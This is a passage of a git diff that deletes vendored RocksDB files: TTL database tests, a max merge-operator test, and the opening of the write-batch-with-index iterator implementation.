-  // Makes a write-batch with key-vals from kvmap_ and 'Write''s it
-  void MakePutWriteBatch(const BatchOperation* batch_ops, int64_t num_ops) {
-    ASSERT_LE(num_ops, static_cast<int64_t>(kvmap_.size()));
-    static WriteOptions wopts;
-    static FlushOptions flush_opts;
-    WriteBatch batch;
-    kv_it_ = kvmap_.begin();
-    for (int64_t i = 0; i < num_ops && kv_it_ != kvmap_.end(); i++, ++kv_it_) {
-      switch (batch_ops[i]) {
-        case OP_PUT:
-          batch.Put(kv_it_->first, kv_it_->second);
-          break;
-        case OP_DELETE:
-          batch.Delete(kv_it_->first);
-          break;
-        default:
-          FAIL();
-      }
-    }
-    db_ttl_->Write(wopts, &batch);
-    db_ttl_->Flush(flush_opts);
-  }
-
-  // Puts num_entries starting from start_pos_map from kvmap_ into the database
-  void PutValues(int64_t start_pos_map, int64_t num_entries, bool flush = true,
-                 ColumnFamilyHandle* cf = nullptr) {
-    ASSERT_TRUE(db_ttl_);
-    ASSERT_LE(start_pos_map + num_entries, static_cast<int64_t>(kvmap_.size()));
-    static WriteOptions wopts;
-    static FlushOptions flush_opts;
-    kv_it_ = kvmap_.begin();
-    advance(kv_it_, start_pos_map);
-    for (int64_t i = 0; kv_it_ != kvmap_.end() && i < num_entries;
-         i++, ++kv_it_) {
-      ASSERT_OK(cf == nullptr
-                    ? db_ttl_->Put(wopts, kv_it_->first, kv_it_->second)
-                    : db_ttl_->Put(wopts, cf, kv_it_->first, kv_it_->second));
-    }
-    // Put a mock kv at the end because CompactionFilter doesn't delete last key
-    ASSERT_OK(cf == nullptr ? db_ttl_->Put(wopts, "keymock", "valuemock")
-                            : db_ttl_->Put(wopts, cf, "keymock", "valuemock"));
-    if (flush) {
-      if (cf == nullptr) {
-        db_ttl_->Flush(flush_opts);
-      } else {
-        db_ttl_->Flush(flush_opts, cf);
-      }
-    }
-  }
-
-  // Runs a manual compaction
-  void ManualCompact(ColumnFamilyHandle* cf = nullptr) {
-    if (cf == nullptr) {
-      db_ttl_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    } else {
-      db_ttl_->CompactRange(CompactRangeOptions(), cf, nullptr, nullptr);
-    }
-  }
-
-  // checks the whole kvmap_ to return correct values using KeyMayExist
-  void SimpleKeyMayExistCheck() {
-    static ReadOptions ropts;
-    bool value_found;
-    std::string val;
-    for(auto &kv : kvmap_) {
-      bool ret = db_ttl_->KeyMayExist(ropts, kv.first, &val, &value_found);
-      if (ret == false || value_found == false) {
-        fprintf(stderr, "KeyMayExist could not find key=%s in the database but"
-                        " should have\n", kv.first.c_str());
-        FAIL();
-      } else if (val.compare(kv.second) != 0) {
-        fprintf(stderr, " value for key=%s present in database is %s but"
-                        " should be %s\n", kv.first.c_str(), val.c_str(),
-                        kv.second.c_str());
-        FAIL();
-      }
-    }
-  }
-
-  // checks the whole kvmap_ to return correct values using MultiGet
-  void SimpleMultiGetTest() {
-    static ReadOptions ropts;
-    std::vector<Slice> keys;
-    std::vector<std::string> values;
-
-    for (auto& kv : kvmap_) {
-      keys.emplace_back(kv.first);
-    }
-
-    auto statuses = db_ttl_->MultiGet(ropts, keys, &values);
-    size_t i = 0;
-    for (auto& kv : kvmap_) {
-      ASSERT_OK(statuses[i]);
-      ASSERT_EQ(values[i], kv.second);
-      ++i;
-    }
-  }
-
-  // Sleeps for slp_tim then runs a manual compaction
-  // Checks span starting from st_pos from kvmap_ in the db and
-  // Gets should return true if check is true and false otherwise
-  // Also checks that value that we got is the same as inserted; and =kNewValue
-  //   if test_compaction_change is true
-  void SleepCompactCheck(int slp_tim, int64_t st_pos, int64_t span,
-                         bool check = true, bool test_compaction_change = false,
-                         ColumnFamilyHandle* cf = nullptr) {
-    ASSERT_TRUE(db_ttl_);
-
-    env_->Sleep(slp_tim);
-    ManualCompact(cf);
-    static ReadOptions ropts;
-    kv_it_ = kvmap_.begin();
-    advance(kv_it_, st_pos);
-    std::string v;
-    for (int64_t i = 0; kv_it_ != kvmap_.end() && i < span; i++, ++kv_it_) {
-      Status s = (cf == nullptr) ? db_ttl_->Get(ropts, kv_it_->first, &v)
-                                 : db_ttl_->Get(ropts, cf, kv_it_->first, &v);
-      if (s.ok() != check) {
-        fprintf(stderr, "key=%s ", kv_it_->first.c_str());
-        if (!s.ok()) {
-          fprintf(stderr, "is absent from db but was expected to be present\n");
-        } else {
-          fprintf(stderr, "is present in db but was expected to be absent\n");
-        }
-        FAIL();
-      } else if (s.ok()) {
-          if (test_compaction_change && v.compare(kNewValue_) != 0) {
-            fprintf(stderr, " value for key=%s present in database is %s but "
-                            " should be %s\n", kv_it_->first.c_str(), v.c_str(),
-                            kNewValue_.c_str());
-            FAIL();
-          } else if (!test_compaction_change && v.compare(kv_it_->second) !=0) {
-            fprintf(stderr, " value for key=%s present in database is %s but "
-                            " should be %s\n", kv_it_->first.c_str(), v.c_str(),
-                            kv_it_->second.c_str());
-            FAIL();
-          }
-      }
-    }
-  }
-
-  // Similar as SleepCompactCheck but uses TtlIterator to read from db
-  void SleepCompactCheckIter(int slp, int st_pos, int64_t span,
-                             bool check = true) {
-    ASSERT_TRUE(db_ttl_);
-    env_->Sleep(slp);
-    ManualCompact();
-    static ReadOptions ropts;
-    Iterator *dbiter = db_ttl_->NewIterator(ropts);
-    kv_it_ = kvmap_.begin();
-    advance(kv_it_, st_pos);
-
-    dbiter->Seek(kv_it_->first);
-    if (!check) {
-      if (dbiter->Valid()) {
-        ASSERT_NE(dbiter->value().compare(kv_it_->second), 0);
-      }
-    } else {  // dbiter should have found out kvmap_[st_pos]
-      for (int64_t i = st_pos; kv_it_ != kvmap_.end() && i < st_pos + span;
-           i++, ++kv_it_) {
-        ASSERT_TRUE(dbiter->Valid());
-        ASSERT_EQ(dbiter->value().compare(kv_it_->second), 0);
-        dbiter->Next();
-      }
-    }
-    delete dbiter;
-  }
-
-  class TestFilter : public CompactionFilter {
-   public:
-    TestFilter(const int64_t kSampleSize, const std::string& kNewValue)
-      : kSampleSize_(kSampleSize),
-        kNewValue_(kNewValue) {
-    }
-
-    // Works on keys of the form "key<number>"
-    // Drops key if number at the end of key is in [0, kSampleSize_/3),
-    // Keeps key if it is in [kSampleSize_/3, 2*kSampleSize_/3),
-    // Change value if it is in [2*kSampleSize_/3, kSampleSize_)
-    // Eg. kSampleSize_=6. Drop:key0-1...Keep:key2-3...Change:key4-5...
-    virtual bool Filter(int level, const Slice& key,
-                        const Slice& value, std::string* new_value,
-                        bool* value_changed) const override {
-      assert(new_value != nullptr);
-
-      std::string search_str = "0123456789";
-      std::string key_string = key.ToString();
-      size_t pos = key_string.find_first_of(search_str);
-      int num_key_end;
-      if (pos != std::string::npos) {
-        auto key_substr = key_string.substr(pos, key.size() - pos);
-#ifndef CYGWIN
-        num_key_end = std::stoi(key_substr);
-#else
-        num_key_end = std::strtol(key_substr.c_str(), 0, 10);
-#endif
-
-      } else {
-        return false; // Keep keys not matching the format "key<NUMBER>"
-      }
-
-      int64_t partition = kSampleSize_ / 3;
-      if (num_key_end < partition) {
-        return true;
-      } else if (num_key_end < partition * 2) {
-        return false;
-      } else {
-        *new_value = kNewValue_;
-        *value_changed = true;
-        return false;
-      }
-    }
-
-    virtual const char* Name() const override {
-      return "TestFilter";
-    }
-
-   private:
-    const int64_t kSampleSize_;
-    const std::string kNewValue_;
-  };
-
-  class TestFilterFactory : public CompactionFilterFactory {
-    public:
-      TestFilterFactory(const int64_t kSampleSize, const std::string& kNewValue)
-        : kSampleSize_(kSampleSize),
-          kNewValue_(kNewValue) {
-      }
-
-      virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-          const CompactionFilter::Context& context) override {
-        return std::unique_ptr<CompactionFilter>(
-            new TestFilter(kSampleSize_, kNewValue_));
-      }
-
-      virtual const char* Name() const override {
-        return "TestFilterFactory";
-      }
-
-    private:
-      const int64_t kSampleSize_;
-      const std::string kNewValue_;
-  };
-
-
-  // Choose carefully so that Put, Gets & Compaction complete in 1 second buffer
-  static const int64_t kSampleSize_ = 100;
-  std::string dbname_;
-  DBWithTTL* db_ttl_;
-  unique_ptr<SpecialTimeEnv> env_;
-
- private:
-  Options options_;
-  KVMap kvmap_;
-  KVMap::iterator kv_it_;
-  const std::string kNewValue_ = "new_value";
-  unique_ptr<CompactionFilter> test_comp_filter_;
-}; // class TtlTest
-
-// If TTL is non positive or not provided, the behaviour is TTL = infinity
-// This test opens the db 3 times with such default behavior and inserts a
-// bunch of kvs each time. All kvs should accumulate in the db till the end
-// Partitions the sample-size provided into 3 sets over boundary1 and boundary2
-TEST_F(TtlTest, NoEffect) {
-  MakeKVMap(kSampleSize_);
-  int64_t boundary1 = kSampleSize_ / 3;
-  int64_t boundary2 = 2 * boundary1;
-
-  OpenTtl();
-  PutValues(0, boundary1);                       //T=0: Set1 never deleted
-  SleepCompactCheck(1, 0, boundary1);            //T=1: Set1 still there
-  CloseTtl();
-
-  OpenTtl(0);
-  PutValues(boundary1, boundary2 - boundary1);   //T=1: Set2 never deleted
-  SleepCompactCheck(1, 0, boundary2);            //T=2: Sets1 & 2 still there
-  CloseTtl();
-
-  OpenTtl(-1);
-  PutValues(boundary2, kSampleSize_ - boundary2); //T=3: Set3 never deleted
-  SleepCompactCheck(1, 0, kSampleSize_, true);    //T=4: Sets 1,2,3 still there
-  CloseTtl();
-}
-
-// Puts a set of values and checks its presence using Get during ttl
-TEST_F(TtlTest, PresentDuringTTL) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(2);                                 // T=0:Open the db with ttl = 2
-  PutValues(0, kSampleSize_);                  // T=0:Insert Set1. Delete at t=2
-  SleepCompactCheck(1, 0, kSampleSize_, true); // T=1:Set1 should still be there
-  CloseTtl();
-}
-
-// Puts a set of values and checks its absence using Get after ttl
-TEST_F(TtlTest, AbsentAfterTTL) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);                                  // T=0:Open the db with ttl = 2
-  PutValues(0, kSampleSize_);                  // T=0:Insert Set1. Delete at t=2
-  SleepCompactCheck(2, 0, kSampleSize_, false); // T=2:Set1 should not be there
-  CloseTtl();
-}
-
-// Resets the timestamp of a set of kvs by updating them and checks that they
-// are not deleted according to the old timestamp
-TEST_F(TtlTest, ResetTimestamp) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(3);
-  PutValues(0, kSampleSize_);            // T=0: Insert Set1. Delete at t=3
-  env_->Sleep(2);                        // T=2
-  PutValues(0, kSampleSize_);            // T=2: Insert Set1. Delete at t=5
-  SleepCompactCheck(2, 0, kSampleSize_); // T=4: Set1 should still be there
-  CloseTtl();
-}
-
-// Similar to PresentDuringTTL but uses Iterator
-TEST_F(TtlTest, IterPresentDuringTTL) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(2);
-  PutValues(0, kSampleSize_);                 // T=0: Insert. Delete at t=2
-  SleepCompactCheckIter(1, 0, kSampleSize_);  // T=1: Set should be there
-  CloseTtl();
-}
-
-// Similar to AbsentAfterTTL but uses Iterator
-TEST_F(TtlTest, IterAbsentAfterTTL) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);
-  PutValues(0, kSampleSize_);                      // T=0: Insert. Delete at t=1
-  SleepCompactCheckIter(2, 0, kSampleSize_, false); // T=2: Should not be there
-  CloseTtl();
-}
-
-// Checks presence while opening the same db more than once with the same ttl
-// Note: The second open will open the same db
-TEST_F(TtlTest, MultiOpenSamePresent) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(2);
-  PutValues(0, kSampleSize_);                   // T=0: Insert. Delete at t=2
-  CloseTtl();
-
-  OpenTtl(2);                                  // T=0. Delete at t=2
-  SleepCompactCheck(1, 0, kSampleSize_);        // T=1: Set should be there
-  CloseTtl();
-}
-
-// Checks absence while opening the same db more than once with the same ttl
-// Note: The second open will open the same db
-TEST_F(TtlTest, MultiOpenSameAbsent) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);
-  PutValues(0, kSampleSize_);                   // T=0: Insert. Delete at t=1
-  CloseTtl();
-
-  OpenTtl(1);                                  // T=0.Delete at t=1
-  SleepCompactCheck(2, 0, kSampleSize_, false); // T=2: Set should not be there
-  CloseTtl();
-}
-
-// Checks presence while opening the same db more than once with bigger ttl
-TEST_F(TtlTest, MultiOpenDifferent) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);
-  PutValues(0, kSampleSize_);            // T=0: Insert. Delete at t=1
-  CloseTtl();
-
-  OpenTtl(3);                           // T=0: Set deleted at t=3
-  SleepCompactCheck(2, 0, kSampleSize_); // T=2: Set should be there
-  CloseTtl();
-}
-
-// Checks presence during ttl in read_only mode
-TEST_F(TtlTest, ReadOnlyPresentForever) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);                                 // T=0:Open the db normally
-  PutValues(0, kSampleSize_);                  // T=0:Insert Set1. Delete at t=1
-  CloseTtl();
-
-  OpenReadOnlyTtl(1);
-  SleepCompactCheck(2, 0, kSampleSize_);       // T=2:Set1 should still be there
-  CloseTtl();
-}
-
-// Checks whether WriteBatch works well with TTL
-// Puts all kvs in kvmap_ in a batch and writes first, then deletes first half
-TEST_F(TtlTest, WriteBatchTest) {
-  MakeKVMap(kSampleSize_);
-  BatchOperation batch_ops[kSampleSize_];
-  for (int i = 0; i < kSampleSize_; i++) {
-    batch_ops[i] = OP_PUT;
-  }
-
-  OpenTtl(2);
-  MakePutWriteBatch(batch_ops, kSampleSize_);
-  for (int i = 0; i < kSampleSize_ / 2; i++) {
-    batch_ops[i] = OP_DELETE;
-  }
-  MakePutWriteBatch(batch_ops, kSampleSize_ / 2);
-  SleepCompactCheck(0, 0, kSampleSize_ / 2, false);
-  SleepCompactCheck(0, kSampleSize_ / 2, kSampleSize_ - kSampleSize_ / 2);
-  CloseTtl();
-}
-
-// Checks user's compaction filter for correctness with TTL logic
-TEST_F(TtlTest, CompactionFilter) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtlWithTestCompaction(1);
-  PutValues(0, kSampleSize_);                  // T=0:Insert Set1. Delete at t=1
-  // T=2: TTL logic takes precedence over TestFilter:-Set1 should not be there
-  SleepCompactCheck(2, 0, kSampleSize_, false);
-  CloseTtl();
-
-  OpenTtlWithTestCompaction(3);
-  PutValues(0, kSampleSize_);                   // T=0:Insert Set1.
-  int64_t partition = kSampleSize_ / 3;
-  SleepCompactCheck(1, 0, partition, false);                  // Part dropped
-  SleepCompactCheck(0, partition, partition);                 // Part kept
-  SleepCompactCheck(0, 2 * partition, partition, true, true); // Part changed
-  CloseTtl();
-}
-
-// Insert some key-values which KeyMayExist should be able to get and check that
-// values returned are fine
-TEST_F(TtlTest, KeyMayExist) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl();
-  PutValues(0, kSampleSize_, false);
-
-  SimpleKeyMayExistCheck();
-
-  CloseTtl();
-}
-
-TEST_F(TtlTest, MultiGetTest) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl();
-  PutValues(0, kSampleSize_, false);
-
-  SimpleMultiGetTest();
-
-  CloseTtl();
-}
-
-TEST_F(TtlTest, ColumnFamiliesTest) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_.get();
-
-  DB::Open(options, dbname_, &db);
-  ColumnFamilyHandle* handle;
-  ASSERT_OK(db->CreateColumnFamily(ColumnFamilyOptions(options),
-                                   "ttl_column_family", &handle));
-
-  delete handle;
-  delete db;
-
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName, ColumnFamilyOptions(options)));
-  column_families.push_back(ColumnFamilyDescriptor(
-      "ttl_column_family", ColumnFamilyOptions(options)));
-
-  std::vector<ColumnFamilyHandle*> handles;
-
-  ASSERT_OK(DBWithTTL::Open(DBOptions(options), dbname_, column_families,
-                            &handles, &db_ttl_, {3, 5}, false));
-  ASSERT_EQ(handles.size(), 2U);
-  ColumnFamilyHandle* new_handle;
-  ASSERT_OK(db_ttl_->CreateColumnFamilyWithTtl(options, "ttl_column_family_2",
-                                               &new_handle, 2));
-  handles.push_back(new_handle);
-
-  MakeKVMap(kSampleSize_);
-  PutValues(0, kSampleSize_, false, handles[0]);
-  PutValues(0, kSampleSize_, false, handles[1]);
-  PutValues(0, kSampleSize_, false, handles[2]);
-
-  // everything should be there after 1 second
-  SleepCompactCheck(1, 0, kSampleSize_, true, false, handles[0]);
-  SleepCompactCheck(0, 0, kSampleSize_, true, false, handles[1]);
-  SleepCompactCheck(0, 0, kSampleSize_, true, false, handles[2]);
-
-  // only column family 1 should be alive after 4 seconds
-  SleepCompactCheck(3, 0, kSampleSize_, false, false, handles[0]);
-  SleepCompactCheck(0, 0, kSampleSize_, true, false, handles[1]);
-  SleepCompactCheck(0, 0, kSampleSize_, false, false, handles[2]);
-
-  // nothing should be there after 6 seconds
-  SleepCompactCheck(2, 0, kSampleSize_, false, false, handles[0]);
-  SleepCompactCheck(0, 0, kSampleSize_, false, false, handles[1]);
-  SleepCompactCheck(0, 0, kSampleSize_, false, false, handles[2]);
-
-  for (auto h : handles) {
-    delete h;
-  }
-  delete db_ttl_;
-  db_ttl_ = nullptr;
-}
-
-} //  namespace rocksdb
-
-// A black-box test for the ttl wrapper around rocksdb
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as DBWithTTL is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/util_merge_operators_test.cc b/thirdparty/rocksdb/utilities/util_merge_operators_test.cc
deleted file mode 100644
index d8b3cfb..0000000
--- a/thirdparty/rocksdb/utilities/util_merge_operators_test.cc
+++ /dev/null
@@ -1,99 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-class UtilMergeOperatorTest : public testing::Test {
- public:
-  UtilMergeOperatorTest() {}
-
-  std::string FullMergeV2(std::string existing_value,
-                          std::vector<std::string> operands,
-                          std::string key = "") {
-    std::string result;
-    Slice result_operand(nullptr, 0);
-
-    Slice existing_value_slice(existing_value);
-    std::vector<Slice> operands_slice(operands.begin(), operands.end());
-
-    const MergeOperator::MergeOperationInput merge_in(
-        key, &existing_value_slice, operands_slice, nullptr);
-    MergeOperator::MergeOperationOutput merge_out(result, result_operand);
-    merge_operator_->FullMergeV2(merge_in, &merge_out);
-
-    if (result_operand.data()) {
-      result.assign(result_operand.data(), result_operand.size());
-    }
-    return result;
-  }
-
-  std::string FullMergeV2(std::vector<std::string> operands,
-                          std::string key = "") {
-    std::string result;
-    Slice result_operand(nullptr, 0);
-
-    std::vector<Slice> operands_slice(operands.begin(), operands.end());
-
-    const MergeOperator::MergeOperationInput merge_in(key, nullptr,
-                                                      operands_slice, nullptr);
-    MergeOperator::MergeOperationOutput merge_out(result, result_operand);
-    merge_operator_->FullMergeV2(merge_in, &merge_out);
-
-    if (result_operand.data()) {
-      result.assign(result_operand.data(), result_operand.size());
-    }
-    return result;
-  }
-
-  std::string PartialMerge(std::string left, std::string right,
-                           std::string key = "") {
-    std::string result;
-
-    merge_operator_->PartialMerge(key, left, right, &result, nullptr);
-    return result;
-  }
-
-  std::string PartialMergeMulti(std::deque<std::string> operands,
-                                std::string key = "") {
-    std::string result;
-    std::deque<Slice> operands_slice(operands.begin(), operands.end());
-
-    merge_operator_->PartialMergeMulti(key, operands_slice, &result, nullptr);
-    return result;
-  }
-
- protected:
-  std::shared_ptr<MergeOperator> merge_operator_;
-};
-
-TEST_F(UtilMergeOperatorTest, MaxMergeOperator) {
-  merge_operator_ = MergeOperators::CreateMaxOperator();
-
-  EXPECT_EQ("B", FullMergeV2("B", {"A"}));
-  EXPECT_EQ("B", FullMergeV2("A", {"B"}));
-  EXPECT_EQ("", FullMergeV2({"", "", ""}));
-  EXPECT_EQ("A", FullMergeV2({"A"}));
-  EXPECT_EQ("ABC", FullMergeV2({"ABC"}));
-  EXPECT_EQ("Z", FullMergeV2({"ABC", "Z", "C", "AXX"}));
-  EXPECT_EQ("ZZZ", FullMergeV2({"ABC", "CC", "Z", "ZZZ"}));
-  EXPECT_EQ("a", FullMergeV2("a", {"ABC", "CC", "Z", "ZZZ"}));
-
-  EXPECT_EQ("z", PartialMergeMulti({"a", "z", "efqfqwgwew", "aaz", "hhhhh"}));
-
-  EXPECT_EQ("b", PartialMerge("a", "b"));
-  EXPECT_EQ("z", PartialMerge("z", "azzz"));
-  EXPECT_EQ("a", PartialMerge("a", ""));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index.cc b/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index.cc
deleted file mode 100644
index b282010..0000000
--- a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index.cc
+++ /dev/null
@@ -1,876 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/write_batch_with_index.h"
-
-#include <limits>
-#include <memory>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "memtable/skiplist.h"
-#include "options/db_options.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "util/arena.h"
-#include "utilities/write_batch_with_index/write_batch_with_index_internal.h"
-
-namespace rocksdb {
-
-// when direction == forward
-// * current_at_base_ <=> base_iterator > delta_iterator
-// when direction == backwards
-// * current_at_base_ <=> base_iterator < delta_iterator
-// always:
-// * equal_keys_ <=> base_iterator == delta_iterator
-class BaseDeltaIterator : public Iterator {
- public:
-  BaseDeltaIterator(Iterator* base_iterator, WBWIIterator* delta_iterator,
-                    const Comparator* comparator)
-      : forward_(true),
-        current_at_base_(true),
-        equal_keys_(false),
-        status_(Status::OK()),
-        base_iterator_(base_iterator),
-        delta_iterator_(delta_iterator),
-        comparator_(comparator) {}
-
-  virtual ~BaseDeltaIterator() {}
-
-  bool Valid() const override {
-    return current_at_base_ ? BaseValid() : DeltaValid();
-  }
-
-  void SeekToFirst() override {
-    forward_ = true;
-    base_iterator_->SeekToFirst();
-    delta_iterator_->SeekToFirst();
-    UpdateCurrent();
-  }
-
-  void SeekToLast() override {
-    forward_ = false;
-    base_iterator_->SeekToLast();
-    delta_iterator_->SeekToLast();
-    UpdateCurrent();
-  }
-
-  void Seek(const Slice& k) override {
-    forward_ = true;
-    base_iterator_->Seek(k);
-    delta_iterator_->Seek(k);
-    UpdateCurrent();
-  }
-
-  void SeekForPrev(const Slice& k) override {
-    forward_ = false;
-    base_iterator_->SeekForPrev(k);
-    delta_iterator_->SeekForPrev(k);
-    UpdateCurrent();
-  }
-
-  void Next() override {
-    if (!Valid()) {
-      status_ = Status::NotSupported("Next() on invalid iterator");
-    }
-
-    if (!forward_) {
-      // Need to change direction
-      // if our direction was backward and we're not equal, we have two states:
-      // * both iterators are valid: we're already in a good state (current
-      // shows to smaller)
-      // * only one iterator is valid: we need to advance that iterator
-      forward_ = true;
-      equal_keys_ = false;
-      if (!BaseValid()) {
-        assert(DeltaValid());
-        base_iterator_->SeekToFirst();
-      } else if (!DeltaValid()) {
-        delta_iterator_->SeekToFirst();
-      } else if (current_at_base_) {
-        // Change delta from larger than base to smaller
-        AdvanceDelta();
-      } else {
-        // Change base from larger than delta to smaller
-        AdvanceBase();
-      }
-      if (DeltaValid() && BaseValid()) {
-        if (comparator_->Equal(delta_iterator_->Entry().key,
-                               base_iterator_->key())) {
-          equal_keys_ = true;
-        }
-      }
-    }
-    Advance();
-  }
-
-  void Prev() override {
-    if (!Valid()) {
-      status_ = Status::NotSupported("Prev() on invalid iterator");
-    }
-
-    if (forward_) {
-      // Need to change direction
-      // if our direction was backward and we're not equal, we have two states:
-      // * both iterators are valid: we're already in a good state (current
-      // shows to smaller)
-      // * only one iterator is valid: we need to advance that iterator
-      forward_ = false;
-      equal_keys_ = false;
-      if (!BaseValid()) {
-        assert(DeltaValid());
-        base_iterator_->SeekToLast();
-      } else if (!DeltaValid()) {
-        delta_iterator_->SeekToLast();
-      } else if (current_at_base_) {
-        // Change delta from less advanced than base to more advanced
-        AdvanceDelta();
-      } else {
-        // Change base from less advanced than delta to more advanced
-        AdvanceBase();
-      }
-      if (DeltaValid() && BaseValid()) {
-        if (comparator_->Equal(delta_iterator_->Entry().key,
-                               base_iterator_->key())) {
-          equal_keys_ = true;
-        }
-      }
-    }
-
-    Advance();
-  }
-
-  Slice key() const override {
-    return current_at_base_ ? base_iterator_->key()
-                            : delta_iterator_->Entry().key;
-  }
-
-  Slice value() const override {
-    return current_at_base_ ? base_iterator_->value()
-                            : delta_iterator_->Entry().value;
-  }
-
-  Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    }
-    if (!base_iterator_->status().ok()) {
-      return base_iterator_->status();
-    }
-    return delta_iterator_->status();
-  }
-
- private:
-  void AssertInvariants() {
-#ifndef NDEBUG
-    if (!Valid()) {
-      return;
-    }
-    if (!BaseValid()) {
-      assert(!current_at_base_ && delta_iterator_->Valid());
-      return;
-    }
-    if (!DeltaValid()) {
-      assert(current_at_base_ && base_iterator_->Valid());
-      return;
-    }
-    // we don't support those yet
-    assert(delta_iterator_->Entry().type != kMergeRecord &&
-           delta_iterator_->Entry().type != kLogDataRecord);
-    int compare = comparator_->Compare(delta_iterator_->Entry().key,
-                                       base_iterator_->key());
-    if (forward_) {
-      // current_at_base -> compare < 0
-      assert(!current_at_base_ || compare < 0);
-      // !current_at_base -> compare <= 0
-      assert(current_at_base_ && compare >= 0);
-    } else {
-      // current_at_base -> compare > 0
-      assert(!current_at_base_ || compare > 0);
-      // !current_at_base -> compare <= 0
-      assert(current_at_base_ && compare <= 0);
-    }
-    // equal_keys_ <=> compare == 0
-    assert((equal_keys_ || compare != 0) && (!equal_keys_ || compare == 0));
-#endif
-  }
-
-  void Advance() {
-    if (equal_keys_) {
-      assert(BaseValid() && DeltaValid());
-      AdvanceBase();
-      AdvanceDelta();
-    } else {
-      if (current_at_base_) {
-        assert(BaseValid());
-        AdvanceBase();
-      } else {
-        assert(DeltaValid());
-        AdvanceDelta();
-      }
-    }
-    UpdateCurrent();
-  }
-
-  void AdvanceDelta() {
-    if (forward_) {
-      delta_iterator_->Next();
-    } else {
-      delta_iterator_->Prev();
-    }
-  }
-  void AdvanceBase() {
-    if (forward_) {
-      base_iterator_->Next();
-    } else {
-      base_iterator_->Prev();
-    }
-  }
-  bool BaseValid() const { return base_iterator_->Valid(); }
-  bool DeltaValid() const { return delta_iterator_->Valid(); }
-  void UpdateCurrent() {
-// Suppress false positive clang analyzer warnings.
-#ifndef __clang_analyzer__
-    while (true) {
-      WriteEntry delta_entry;
-      if (DeltaValid()) {
-        delta_entry = delta_iterator_->Entry();
-      }
-      equal_keys_ = false;
-      if (!BaseValid()) {
-        // Base has finished.
-        if (!DeltaValid()) {
-          // Finished
-          return;
-        }
-        if (delta_entry.type == kDeleteRecord ||
-            delta_entry.type == kSingleDeleteRecord) {
-          AdvanceDelta();
-        } else {
-          current_at_base_ = false;
-          return;
-        }
-      } else if (!DeltaValid()) {
-        // Delta has finished.
-        current_at_base_ = true;
-        return;
-      } else {
-        int compare =
-            (forward_ ? 1 : -1) *
-            comparator_->Compare(delta_entry.key, base_iterator_->key());
-        if (compare <= 0) {  // delta bigger or equal
-          if (compare == 0) {
-            equal_keys_ = true;
-          }
-          if (delta_entry.type != kDeleteRecord &&
-              delta_entry.type != kSingleDeleteRecord) {
-            current_at_base_ = false;
-            return;
-          }
-          // Delta is less advanced and is delete.
-          AdvanceDelta();
-          if (equal_keys_) {
-            AdvanceBase();
-          }
-        } else {
-          current_at_base_ = true;
-          return;
-        }
-      }
-    }
-
-    AssertInvariants();
-#endif  // __clang_analyzer__
-  }
-
-  bool forward_;
-  bool current_at_base_;
-  bool equal_keys_;
-  Status status_;
-  std::unique_ptr<Iterator> base_iterator_;
-  std::unique_ptr<WBWIIterator> delta_iterator_;
-  const Comparator* comparator_;  // not owned
-};
-
-typedef SkipList<WriteBatchIndexEntry*, const WriteBatchEntryComparator&>
-    WriteBatchEntrySkipList;
-
-class WBWIIteratorImpl : public WBWIIterator {
- public:
-  WBWIIteratorImpl(uint32_t column_family_id,
-                   WriteBatchEntrySkipList* skip_list,
-                   const ReadableWriteBatch* write_batch)
-      : column_family_id_(column_family_id),
-        skip_list_iter_(skip_list),
-        write_batch_(write_batch) {}
-
-  virtual ~WBWIIteratorImpl() {}
-
-  virtual bool Valid() const override {
-    if (!skip_list_iter_.Valid()) {
-      return false;
-    }
-    const WriteBatchIndexEntry* iter_entry = skip_list_iter_.key();
-    return (iter_entry != nullptr &&
-            iter_entry->column_family == column_family_id_);
-  }
-
-  virtual void SeekToFirst() override {
-    WriteBatchIndexEntry search_entry(WriteBatchIndexEntry::kFlagMin,
-                                      column_family_id_, 0, 0);
-    skip_list_iter_.Seek(&search_entry);
-  }
-
-  virtual void SeekToLast() override {
